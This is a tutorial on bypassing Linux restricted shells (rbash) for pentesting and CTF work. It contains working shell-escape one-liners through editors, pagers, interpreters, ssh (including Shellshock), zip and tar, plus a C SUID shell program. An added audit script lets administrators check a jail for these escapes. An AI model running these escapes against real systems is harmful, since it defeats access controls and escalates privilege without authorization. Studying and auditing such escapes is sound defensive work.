Author: @n4ckhcker & @h4d3sw0rm
Introduction
Hello, so first of all let's explain what a restricted shell is. A restricted shell is a shell that blocks or restricts some commands like cd, ls, echo etc., or "blocks" environment variables like SHELL, PATH, USER. Sometimes a restricted shell can also block commands and/or output redirection like >, >>. The types of restricted shell are: rbash, rksh, rsh. But why would someone want to create a restricted shell?
Some examples:
1) To improve security.
2) To block hackers/pentesters.
3) Sometimes system administrators create a restricted shell to protect themselves from dangerous commands.
4) For a CTF challenge (Root-Me/HackTheBox/VulnHub).
Enumerating the Linux Environment
Enumeration is the most important part. We need to enumerate the Linux environment to find out "what we can do" to bypass rbash. We need to enumerate:
1) First we must check for available commands like cd/ls/echo etc.
2) We must check for operators like >, >>, <, |.
3) We need to check for available programming languages like Perl, Ruby, Python etc.
4) Which commands we can run as root (sudo -l).
5) Check for files or commands with the SUID permission.
6) You must check which shell you are in: echo $SHELL. 90% of the time you'll be in rbash.
7) Check the environment variables: run env or printenv.
Now let's move on to common exploitation techniques.
Common Exploitation Techniques
Now let's see some of the common exploitation techniques.
1) If "/" is allowed you can run /bin/sh or /bin/bash.
2) If you can run the cp command you can copy /bin/sh or /bin/bash into your directory.
3) From FTP > !/bin/sh or !/bin/bash
4) From gdb > !/bin/sh or !/bin/bash
5) From more/man/less > !/bin/sh or !/bin/bash
6) From vim > !/bin/sh or !/bin/bash
7) From rvim > :python import os; os.system("/bin/bash")
8) From scp > scp -S /path/yourscript x y:
9) From awk > awk 'BEGIN {system("/bin/sh")}' (or /bin/bash)
10) From find > find / -name test -exec /bin/sh \; (or /bin/bash)
Programming Language Techniques
Now let's look at some programming language techniques.
1) From expect > run expect, then spawn sh, then sh.
2) From Python > python -c 'import os; os.system("/bin/sh")'
3) From PHP > php -a then exec("sh -i");
4) From Perl > perl -e 'exec "/bin/sh";'
5) From Lua > os.execute('/bin/sh') or os.execute('/bin/bash')
6) From Ruby > exec "/bin/sh"
7) From Java > Runtime.getRuntime().exec("/bin/bash")
Now let's move on to advanced techniques.
Advanced Techniques
Now let's move on to some dirty advanced techniques (user@host below stands for the target account and address).
1) From ssh > ssh user@host -t "/bin/sh" or "/bin/bash"
2) From ssh (2) > ssh user@host -t "bash --noprofile"
3) From ssh (3) > ssh user@host -t "() { :; }; /bin/bash" (Shellshock)
4) From ssh (4) > ssh -o ProxyCommand="sh -c /tmp/yourfile.sh" 127.0.0.1 (SUID)
5) From git > git help status > once it opens you can run !/bin/bash
6) From pico > pico -s "/bin/bash", then write /bin/bash and press Ctrl+T
7) From zip > zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"
8) From tar > tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash
C SETUID SHELL:
    /* setresgid/setresuid are GNU extensions; _GNU_SOURCE exposes them on glibc. */
    #define _GNU_SOURCE
    #include <stdlib.h>
    #include <unistd.h>
    #include <stdio.h>

    int main(int argc, char **argv, char **envp)
    {
        /* Make the real and saved ids match the effective (SUID) ids, then exec bash. */
        setresgid(getegid(), getegid(), getegid());
        setresuid(geteuid(), geteuid(), geteuid());
        execve("/bin/bash", argv, envp);
        return 0;
    }
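The flip side of the enumeration and technique lists above is the administrator's audit of a jail. Here is a POSIX sh helper, added here as an example and not part of the original guide, that walks the PATH a restricted user receives and reports every binary the guide names as a shell escape, plus any PATH directory the user can write to (where a copied /bin/sh could be dropped). The jail directory and the empty "vim"/"cat" files it builds are constructed samples.

```shell
#!/bin/sh
# Added audit helper, not from the original guide: a sound rbash jail reports
# no escape-capable binaries and no writable PATH directories.

# Binaries named in the guide above that can spawn an unrestricted shell.
ESCAPE_BINS="sh bash cp ftp gdb more man less vim rvim scp awk find expect
python php perl lua ruby java ssh git pico zip tar"

# audit_path PATHVALUE : print "<dir>/<bin>" for every escape-capable binary.
audit_path() {
  IFS=:; set -- $1; unset IFS          # split PATH on ':' into $1..$n
  for dir in "$@"; do
    for bin in $ESCAPE_BINS; do
      [ -x "$dir/$bin" ] && echo "$dir/$bin"
    done
  done
  return 0
}

# writable_path_dirs PATHVALUE : print PATH directories the current user can
# write to (technique 2 above needs a writable directory to copy a shell into).
writable_path_dirs() {
  IFS=:; set -- $1; unset IFS
  for dir in "$@"; do
    [ -w "$dir" ] && echo "$dir"
  done
  return 0
}

# count_escapes PATHVALUE : number of escape-capable binaries found (target: 0).
count_escapes() { audit_path "$1" | wc -l | tr -d ' '; }

# demo_jail : constructed sample jail with one escape binary (vim) beside a
# harmless one (cat); prints the jail's bin directory for use as PATH.
demo_jail() {
  jail=$(mktemp -d) || return 1
  mkdir "$jail/bin"
  : > "$jail/bin/vim"; : > "$jail/bin/cat"
  chmod 755 "$jail/bin/vim" "$jail/bin/cat"
  echo "$jail/bin"
}

# Stand-alone run against the constructed jail, then clean up.
JAIL_PATH=$(demo_jail)
echo "escape-capable binaries in $JAIL_PATH: $(count_escapes "$JAIL_PATH")"
audit_path "$JAIL_PATH"
echo "writable PATH directories:"
writable_path_dirs "$JAIL_PATH"
[ -n "$JAIL_PATH" ] && rm -r "${JAIL_PATH%/bin}"
```

To audit a real jail, call audit_path and writable_path_dirs with the PATH value set in the restricted user's profile instead of the constructed one.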
Reference:
Linux Restricted Shell Bypass: https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf